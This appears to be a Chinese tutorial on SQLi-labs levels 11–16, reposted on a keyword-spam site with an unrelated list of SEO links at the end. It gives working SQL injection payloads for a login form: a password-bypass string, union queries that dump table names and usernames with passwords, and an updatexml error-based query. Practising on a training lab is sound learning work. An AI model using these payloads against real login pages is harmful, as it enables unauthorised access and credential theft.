当前位置: 首页 > wzjs >正文

网站建设程序开发网站推广方式组合

网站建设程序开发,网站推广方式组合,织梦菜谱网站模板免费下载,开发工具箱第11关 POST请求联合注入一、审题这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。二、思考这里输入1会显示报错,可以判断出是单引号闭合。我们仔…

第11关 POST请求联合注入

一、审题

这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。

二、思考

 这里输入1'会显示报错,可以判断出是单引号闭合。

我们仔细观察报错信息,MySQL 指出错误发生在查询的 '1'' and password='' LIMIT 0,1 部分附近,那么来推测一下原始的查询语句,可能是:

SELECT * FROM users WHERE username = '$uname' and password = '$passwd' LIMIT 0,1

假设在username框中输入1' or 1=1 #来尝试把后面的密码验证注释掉,看看是否能登录成功。

这里使用#注释符是因为post请求会完整传输,无需编码处理。

可以看到这里绕过密码,登录成功,页面显示了用户名和密码。

接下来尝试用联合注入获取更多数据。

三、做法

1.获取数据库名;

-1' union select 1,database()#

2.获取表名;

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3.获取字段名;

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

4.获取字段数据。

-1' union select 1,group_concat(username,'~',password) from users#

第12关 ")闭合的联合注入

第13关  ')闭合的报错注入

这里登录成功没有回显位,但是登录失败会有报错信息。可以使用之前学过的报错注入。

-1') and updatexml(1,concat(0x7e,(select database())),3)#

第14关 双引号闭合的报错注入

第15关 单引号闭合的布尔盲注

只有正确和错误两种页面回显,可以使用布尔盲注。

第16关 ")闭合的布尔盲注

这几关都是通过POST请求的方式注入,把前面的联合注入,报错注入,布尔盲注又复习了一遍。

http://www.dtcms.com/wzjs/523076.html

相关文章:

  • wordpress恢复默认链接郑州客串seo
  • 怎么建设网站商城品牌全网推广
  • 小门户网站模板苹果看国外新闻的app
  • 葫芦岛公司做网站seo推广有哪些公司
  • 做美食网站需求分析报告广东最新新闻
  • 顺德网站制作案例价位百度地图收录提交入口
  • 济南网站建设的方案以网红引流促业态提升
  • 张家港市网站制作app推广是做什么的
  • 无锡手机网站建设报价企业营销推广方案
  • 南昌哪里做网站好百度网址安全中心
  • dede网站qq类资源源码小程序生成平台系统
  • 石家庄建站优化公司百度上做广告怎么收费
  • pis粉丝做的网站seo的基本内容
  • 网站在线提交询盘系统 能直接发到邮箱百度图片识别在线识图
  • 汽配外贸论坛seo刷词工具在线
  • 做烘培网站公众号推广费用一般多少
  • 020网站建设和维护费用seo运营培训
  • 广州建站客服招聘拓客引流推广
  • 区块链开发平台搜索引擎优化seo公司
  • 网站建设 熊掌号网络推广合同
  • 网站换了域名福建网站建设制作
  • 贝壳找房网站做销售百度推广的几种方式
  • 武汉网站建设多少钱最新疫情最新情况
  • 企业网站优化与推广网络设计
  • 网站如何301百度图片搜索网页版
  • 郑州网站建设服务商百度问答入口
  • 网站建设 中企动力厨具seo实战密码第四版pdf
  • 网站制作软件手机网站优化教程
  • 济南网站建设.com百度手游app下载
  • 网站建设及推广防疫管控优化措施